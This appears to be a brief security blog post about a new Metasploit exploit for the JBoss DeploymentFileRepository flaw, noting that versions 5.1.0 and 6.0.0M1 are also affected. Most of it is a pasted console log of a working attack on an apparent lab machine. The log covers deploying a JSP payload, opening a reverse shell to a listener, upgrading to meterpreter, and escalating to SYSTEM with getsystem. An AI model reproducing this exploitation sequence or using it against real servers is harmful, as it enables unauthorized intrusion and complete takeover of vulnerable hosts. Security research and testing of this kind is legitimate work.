MC pushed out a new exploit today ()
so while it lists 4.x as vuln, actually several other versions are vulnerable as well including 6.0.0M1 and 5.1.0 :-)
msf exploit(jboss_deploymentfilerepository) > exploit [*] Started reverse handler on 192.168.1.101:4444 [*] Triggering payload at '/web-console/HYQ.jsp'... [*] Command shell session 3 opened (192.168.1.101:4444 -> 192.168.1.101:57796) at Sun May 09 11:20:31 -0400 2010 Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:/Documents and Settings/Administrator/Desktop/jboss-6.0.0.M1/jboss-6.0.0.M1/bin>whoami whoami win2k3lab/administrator C:/Documents and Settings/Administrator/Desktop/jboss-6.0.0.M1/jboss-6.0.0.M1/bin>^Z Background session 3? [y/N] y msf exploit(jboss_deploymentfilerepository) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 3 shell 192.168.1.101:4444 -> 192.168.1.101:57796 msf exploit(jboss_deploymentfilerepository) > sessions -u 3 msf exploit(jboss_deploymentfilerepository) > msf exploit(jboss_deploymentfilerepository) > [*] Meterpreter session 4 opened (192.168.1.101:4444 -> 192.168.1.101:36591) at Sun May 09 11:21:32 -0400 2010 msf exploit(jboss_deploymentfilerepository) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 3 shell 192.168.1.101:4444 -> 192.168.1.101:57796 4 meterpreter win2k3lab/Administrator @ win2k3lab 192.168.1.101:4444 -> 192.168.1.101:36591 msf exploit(jboss_deploymentfilerepository) > sessions -i 4 [*] Starting interaction with 4... meterpreter > getuid Server username: win2k3lab/Administrator meterpreter > use priv Loading extension priv...success. meterpreter > getsystem ...got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITY/SYSTEM meterpreter > pwd C:/Documents and Settings/Administrator/Desktop/jboss-6.0.0.M1/jboss-6.0.0.M1/bin meterpreter >